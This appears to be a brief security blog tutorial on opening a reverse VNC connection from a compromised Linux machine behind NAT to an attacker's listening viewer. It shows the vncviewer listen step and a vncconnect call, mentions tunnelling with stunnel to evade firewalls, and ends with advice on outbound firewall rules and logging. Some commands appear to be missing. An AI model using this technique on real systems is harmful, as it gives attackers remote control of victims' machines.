A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC can be useful.
If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.
This article is only intended for educational purposes. Please do not use this to try to bypass security controls.
How to set this up
In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.
On the attacking system (which has a public IP address) start vncviewer as follows:
You should get a response something like:
vncviewer -listen: Listening on port 5500
On the target system, you can start the VNC server and enter a password as follows:
It is then possible to use vncconnect to connect the local vncserver on the target system, back to the attacker system:
vncconnect -display :1
This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attackers desktop.
Of course, these connections could be run on different ports (dependent on firewall rules) redirected with port-redirectors, or tunneled over other protocols, perhaps SSL using stunnel for example.
Similar solutions are just as easy with Windows systems, so definitely something to be aware of.
- When definining Firewall rules, it is very important to focus on outbound rules (in addition to inbound rules)
- Outbound connections should be logged and monitored to help identify hackers, virus infection, and technical employees trying to bypass security restrictions.